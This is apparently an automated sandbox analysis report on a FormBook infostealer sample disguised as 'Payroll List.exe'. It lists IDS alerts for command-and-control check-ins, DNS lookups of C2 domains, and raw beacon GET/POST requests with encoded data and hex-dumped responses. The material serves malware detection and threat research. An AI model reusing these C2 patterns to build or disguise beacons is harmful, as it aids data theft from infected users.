Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49724 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49724 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49728 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49732 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49732 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49728 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49716 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49716 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49741 -> 64.190.63.222:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 64.190.63.222:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49737 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49736 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49736 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49740 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49740 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 198.252.98.54:80
Source: DNS query: www.huiguang.xyz
Source: DNS query: www.schedulemassage.xyz
Source: Joe Sandbox View; IP Address: 203.161.49.193
Source: Joe Sandbox View; IP Address: 31.31.196.17
Source: Joe Sandbox View; ASN Name: AS-REGRU
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_00174EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; HTTP traffic detected:
HTTP/1.1 200 OK
date: Fri, 22 Nov 2024 13:46:22 GMT
server: Apache
set-cookie: __tad=1732283182.2614315; expires=Mon, 20-Nov-2034 13:46:22 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Raw (gzip-compressed body): 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00

Source: global traffic; HTTP traffic detected:
HTTP/1.1 200 OK
date: Fri, 22 Nov 2024 13:46:24 GMT
server: Apache
set-cookie: __tad=1732283184.1678705; expires=Mon, 20-Nov-2034 13:46:24 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Raw (gzip-compressed body): as far as the report's dump goes, byte-for-byte the same body as the response above (the dump is cut off in the report).
d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 13:46:27 GMTserver: Apacheset-cookie: __tad=1732283187.3556796; expires=Mon, 20-Nov-2034 13:46:27 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a 
d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
Source: global traffic
HTTP traffic detected: GET /hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.huiguang.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.beingandbecoming.ltd
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.futurevision.life
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /slxp/?NjHpTfh=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs9wYs5314wmawIeBCSIctWMwFCyIHUycaencn4NBaeE5ag==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.schedulemassage.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.mcfunding.org
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.migorengya8.click
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.klohk.tech
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.d63dm.top
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic
HTTP traffic detected: GET /h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.servannto.site
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic
DNS traffic detected: DNS query: www.huiguang.xyz
Source: global traffic
DNS traffic detected: DNS query: www.beingandbecoming.ltd
Source: global traffic
DNS traffic detected: DNS query: www.futurevision.life
Source: global traffic
DNS traffic detected: DNS query: www.schedulemassage.xyz
Source: global traffic
DNS traffic detected: DNS query: www.mcfunding.org
Source: global traffic
DNS traffic detected: DNS query: www.migorengya8.click
Source: global traffic
DNS traffic detected: DNS query: www.klohk.tech
Source: global traffic
DNS traffic detected: DNS query: www.d63dm.top
Source: global traffic
DNS traffic detected: DNS query: www.servannto.site
Source: global traffic
DNS traffic detected: DNS query: www.telforce.one
Source: unknown
HTTP traffic detected: POST /79tr/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Host: www.beingandbecoming.ltd
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 208
  Cache-Control: no-cache
  Origin: http://www.beingandbecoming.ltd
  Referer: http://www.beingandbecoming.ltd/79tr/
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
  Data Raw: 4e 6a 48 70 54 66 68 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 6f 7a 6c 61 4b 53 74 6c 59 6e 34 2b 68 78 36 30 64 79 6a 49 37 52 43 6b 71 33 4d 55 67 51 6e 6a 48 33 43 42 44 73 3d
  Data Ascii: NjHpTfh=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWozlaKStlYn4+hx60dyjI7RCkq3MUgQnjH3CBDs=
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Fri, 22 Nov 2024 13:45:21 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Fri, 22 Nov 2024 13:45:24 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Fri, 22 Nov 2024 13:45:27 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 